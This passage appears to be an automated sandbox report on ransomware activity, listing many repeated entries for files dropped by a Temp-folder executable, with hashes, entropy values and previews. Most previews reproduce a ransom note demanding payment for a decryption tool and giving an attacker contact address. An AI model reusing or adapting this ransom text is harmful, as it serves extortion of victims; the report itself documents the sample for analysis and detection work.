                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1226
                                                                                            Entropy (8bit):7.845278104557044
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:QD518H3wDBWjBzZKR4Gy92ZYd8YB9FI6pEc41MZHpN4/CEzF:CWgDBA+Z88YB9Gqn4uZHpMCEp
                                                                                            MD5:68AD7F4BECC7FA39C16838FA4D3FBEC8
                                                                                            SHA1:6F10982D8C6DEAE063CC20A037FA6AEE6B0099CD
                                                                                            SHA-256:FC0CE74CFF558E24FD8672A6281E20B3EC0EFA8CE935297C54AF665F08BA9A21
                                                                                            SHA-512:E6712A6106010E0DF5F5EF68596E4EFE823910E18CE3ABA7BA008E76A3DB7A03332A3929C96E6D7F6EFEC8F0C260D0222DA3F845BAA6BBFE378679B780605E07
                                                                                            Malicious:false
                                                                                            Preview:.:...m....n/.....o..F..x....q..i......q.7.....V#.I.T.....i.'.9._?.[..'....cV:.P.;..G#T.2..i/......l..._...(....*iEF.X. A$...s.6.Yk..\...To.h."...|yk..Sh.^v.w(.[[......V=...8..:.H6...Q.L....~hG.T......6.-.\$..W..O..K.....dQZ.6j..;.}~../!r...m.R.@0vn.N4.E.....j\S...M....z.........3T.*..M.fg....+..9y....H.)..T.*'t....x...'p..C..i...i....U.G.g...nv..@0.....G#rt.G..r...l.A.5.....%..0*..9...dX=;.q....W..h..z\.'3.|.B.......U..=k.^.Q$u...B.......1L.,.......f ...$Q-...S..~9....(...8.,..B.pX.G...I-.Y3..W...C..1.A........k..n.x.?t.`.........4..v.r.D...YE.a.:.....x.[.J...*{1...L..7X..<...<..).<....C.%./..V.l.2sU&p&..n|..9.1)....\..9T.....h...7.]`..g'..R9.%8.-.......P...D.o..z....#......[..6...y*.w......p...m...?.y.\Lamn....#s....6....t..\..=..p.....0...%..3.\.Z...Ru.....D.P..b.?..(..\......zP..).......YnK+.p..9..o.V?/#..@....`...r.w.....d.?[.7.#.."w.>..1l..X..C.ku.s.!..Q.|.C{.,..0.^._M...aMD0... ..>x.;......`.y.VLp!G.a.....5e....]&.E&.....P4Q.,.$....c
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
